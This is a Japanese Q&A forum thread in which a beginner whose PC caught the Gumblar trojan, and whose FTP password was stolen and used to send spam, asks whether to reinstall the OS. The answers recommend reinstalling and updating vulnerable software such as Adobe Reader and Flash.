ガンブラーウイルスに感染しました。どうすれば?

このQ&Aのポイント
  • ガンブラーウイルスに感染し、FTPでの不正アクセスがありました。ウイルスソフトをインストールし、駆除しました。
  • 不正アクセスやPCの調子はなく、別のオンラインスキャンも検討中です。
  • ウイルスが検出されなかった場合でもリカバリが必要かどうか不明です。
回答を見る
  • ベストアンサー

ガンブラーウイルスに感染しました。どうすれば?

PC初心者です。 よろしくお願いいたします。 ガンブラーウイルスに感染したようで、 FTPよりレンタルサーバ(さくらネット)に 海外からの不正アクセスがありました。 その後、ウイルスソフト(カスペルスキー)をインストールし、 スキャンした所、木馬のトロイ(ガンブラーのこと?)が発見されました。 もちろんすぐに駆除し、 レンタルサーバのパスワードも変更しました。 その後は2週間ほど一度も不正アクセスはありません。 PCの調子も特に悪くはありません。 しかし、その後不安なので再度カスペルスキーの完全スキャンをしましたが、 結果は何も検出はされませんでした。 ただ他にもノートン、ウイルスバスター、マカフィーなどの オンラインスキャンをこれからやってみます。 そこで質問なのですが、 ここまでしてウイルスが検出されなかった場合、 それでもリカバリ(OSの再インストール?) などしないと危険なのでしょうか? 因みにレンタルサーバには まだホームページなどは設置していません。 ただサーバーにメールソフトを 設置されスパムメールを送られていたみたいです。 以上です。 長い文章で恐縮ですが、 何卒よろしくお願いいたします。

質問者が選んだベストアンサー

• ベストアンサー
回答No.3

>ここまでしてウイルスが検出されなかった場合、 >それでもリカバリ(OSの再インストール?) >などしないと危険なのでしょうか?  問題のトロイの木馬が完全に除去されていると保証できるなら OS の 再セットアップ等は必要は無いと思いますが、今後設置予定のサイトを 閲覧するであろう第三者に迷惑をかけないためには念のために再セット アップするのがベター、…というより安心でしょう。  未だ何処かに潜んでいれば、変更した FTPサーバー用のパスワードも 未だに盗まれ続けている可能性があるわけですから。  まぁ 3種類ぐらいのオンラインスキャンで何も検出されなかったなら いちおう安全と判断するしかないかも知れません。 >まだホームページなどは設置していません。  それなら、今のうちにガンブラー対策である関連するソフトウェアに 脆弱性が残っていないかを確認して最新バージョンにアップデートする という処置をとっておきましょう。 MyJVN トップページ(MyJVN バージョンチェッカ) http://jvndb.jvn.jp/apis/myjvn/#VCCHECK  既にご存知とは思いますが、特に「Adobe Reader」や「Flash Player」 そして「QuickTime」等のバージョンが古いと、危ないみたいです。 対象ソフトウェア製品(クライアント用) http://jvndb.jvn.jp/apis/myjvn/vcchecklist.html#myjvnapp01

参考URL:
http://www.itmedia.co.jp/enterprise/articles/1009/08/news056.html
toqiyfkx
質問者

お礼

ご丁寧な回答感謝します! やはりカスペル以外のオンラインスキャンでも 特に異常はなかったようです。 しかしおっしゃる通り、 HP閲覧者にご迷惑をおかけしないように 再セットアップしようと思います。 脆弱性の確認も忘れずにします! 今回の出来事でショックを受けたと同時に かなり勉強にもなりました。

その他の回答 (2)

• imwin7
回答No.2

カスペルスキーを入れたのなら、脆弱性スキャンを行い問題点を修正すれば、 その心配はないと思います。

toqiyfkx
質問者

補足

ご回答ありがとうございます! 脆弱性のスキャンしました。 7つくらい見つかったようですが、 ここから何かしないといけないんですか? 状態:アクティブはありません となっているのですが、 よく意味がわかりません。

回答No.1

>その後、ウイルスソフト(カスペルスキー)をインストールし、 >スキャンした所、木馬のトロイ(ガンブラーのこと?)が発見されました。 こういう記述があるということは、それまでセキュリティソフトはなにもいれていなかったということですか? もしそうであれば、今後のことを考えてリカバリ(OS再インストール)のほうがいいと思います。 もちろん万一ということを考えてのことですが、セキュリティ確保のための手間はいとわないでいただきたいというのが私の考えです。 セキュリティソフトなしでPCを使いHP開設もしようとしていたという、そういうことをした人ができれば再インストールをしないですませたいとお考えなのかもしれませんが、そういうのはいやですね。

toqiyfkx
質問者

お礼

ご回答感謝します! はい、おっしゃるとおりセキュリティソフトを 今まで入れていなかったのです。 ですので、 再インストールはしたいと思います! ありがとうございました!